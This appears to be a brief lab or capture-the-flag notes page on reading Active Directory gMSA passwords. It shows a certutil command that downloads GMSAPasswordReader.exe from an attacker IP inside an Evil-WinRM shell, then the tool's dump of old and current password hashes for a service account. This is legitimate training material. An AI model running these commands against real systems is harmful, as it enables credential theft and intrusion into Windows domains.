GMSA Password Read
Initial Detection:
Reading GMSA using GMSAPasswordReader.exe
GMSAPasswordReader.exe --accountname ''*Evil-WinRM* PS C:\Users\enox> certutil -urlcache -f http://192.168.49.105:443/GMSAPasswordReader.exe GMSAPasswordReader.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
*Evil-WinRM* PS C:\Users\enox> . ./GMSAPasswordReader.exe --accountname 'svc_apache'
Calculating hashes for Old Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : 1808D2C09D9E6A0EDC419A4B13868C92
[*] aes128_cts_hmac_sha1 : 8146F49C50041D6F8F70D45D9F26AF27
[*] aes256_cts_hmac_sha1 : 810B1963081C261DBDA3E91618943A59EA0A9B6DD48BAFA5E30098D0F7412707
[*] des_cbc_md5 : B6E961D04679DA29
Calculating hashes for Current Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : 45EA837EDB477DDA17B5822AD768D0D7
[*] aes128_cts_hmac_sha1 : 9F234A0EEC90B6AF9FC395D85CE938D5
[*] aes256_cts_hmac_sha1 : 90321B028FB63CD44F37BA7F6829F5CBE4DAA1EE926A909EA9CFC607B52A0CA4
[*] des_cbc_md5 : B0750E611F7FA14F
Remotely Read GMSA Passwords
Converting the GMSA to Powershell Variable for Future Use
Last updated
